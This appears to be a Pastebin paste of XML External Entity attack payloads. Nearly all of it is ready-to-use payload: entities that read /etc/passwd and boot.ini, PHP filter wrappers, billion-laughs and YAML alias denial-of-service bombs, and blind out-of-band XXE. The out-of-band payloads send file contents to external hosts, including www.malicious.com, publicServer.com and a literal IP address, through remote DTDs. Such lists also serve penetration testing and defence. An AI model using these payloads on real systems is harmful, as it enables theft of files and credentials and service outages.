Advertisement
Drvirus1911

XXE Payloads

Jan 7th, 2018
1,500
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.25 KB | None | 0 0
  1. XML External Entity
  2.  
  3. An XML External Entity attack is a type of attack against an application that parses XML input
  4. Exploit
  5.  
  6. Basic Test
  7.  
  8. <!--?xml version="1.0" ?-->
  9. <!DOCTYPE replace [<!ENTITY example "Doe"> ]>
  10. <userInfo>
  11. <firstName>John</firstName>
  12. <lastName>&example;</lastName>
  13. </userInfo>
  14.  
  15. Basic XXE
  16.  
  17. Classic XXE
  18.  
  19. <?xml version="1.0"?>
  20. <!DOCTYPE data [
  21. <!ELEMENT data (#ANY)>
  22. <!ENTITY file SYSTEM "file:///etc/passwd">
  23. ]>
  24. <data>&file;</data>
  25.  
  26. <?xml version="1.0" encoding="ISO-8859-1"?>
  27. <!DOCTYPE foo [
  28. <!ELEMENT foo ANY >
  29. <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
  30.  
  31. <?xml version="1.0" encoding="ISO-8859-1"?>
  32. <!DOCTYPE foo [
  33. <!ELEMENT foo ANY >
  34. <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
  35.  
  36. Classic XXE Base64 encoded
  37.  
  38. <!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
  39.  
  40. PHP Wrapper inside XXE
  41.  
  42. <!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
  43. <contacts>
  44. <contact>
  45. <name>Jean &xxe; Dupont</name>
  46. <phone>00 11 22 33 44</phone>
  47. <adress>42 rue du CTF</adress>
  48. <zipcode>75000</zipcode>
  49. <city>Paris</city>
  50. </contact>
  51. </contacts>
  52.  
  53. <?xml version="1.0" encoding="ISO-8859-1"?>
  54. <!DOCTYPE foo [
  55. <!ELEMENT foo ANY >
  56. <!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
  57. ]>
  58. <foo>&xxe;</foo>
  59.  
  60. Deny of service
  61.  
  62. Deny Of Service - Billion Laugh Attack
  63.  
  64. <!DOCTYPE data [
  65. <!ENTITY a0 "dos" >
  66. <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  67. <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  68. <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  69. <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
  70. ]>
  71. <data>&a4;</data>
  72.  
  73. Yaml attack
  74.  
  75. a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
  76. b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
  77. c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
  78. d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
  79. e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
  80. f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
  81. g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
  82. h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
  83. i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
  84.  
  85. Blind XXE
  86.  
  87. Blind XXE
  88.  
  89. <?xml version="1.0" encoding="ISO-8859-1"?>
  90. <!DOCTYPE foo [
  91. <!ELEMENT foo ANY >
  92. <!ENTITY % xxe SYSTEM "file:///etc/passwd" >
  93. <!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
  94. ]
  95. >
  96. <foo>&callhome;</foo>
  97.  
  98. XXE OOB Attack (Yunusov, 2013)
  99.  
  100. <?xml version="1.0" encoding="utf-8"?>
  101. <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
  102. <data>&send;</data>
  103.  
  104. File stored on http://publicServer.com/parameterEntity_oob.dtd
  105. <!ENTITY % file SYSTEM "file:///sys/power/image_size">
  106. <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
  107. %all;
  108.  
  109. XXE OOB with DTD and PHP filter
  110.  
  111. <?xml version="1.0" ?>
  112. <!DOCTYPE r [
  113. <!ELEMENT r ANY >
  114. <!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
  115. %sp;
  116. %param1;
  117. ]>
  118. <r>&exfil;</r>
  119.  
  120. File stored on http://92.222.81.2/dtd.xml
  121. <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
  122. <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
  123.  
  124. XXE Inside SOAP
  125.  
  126. <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement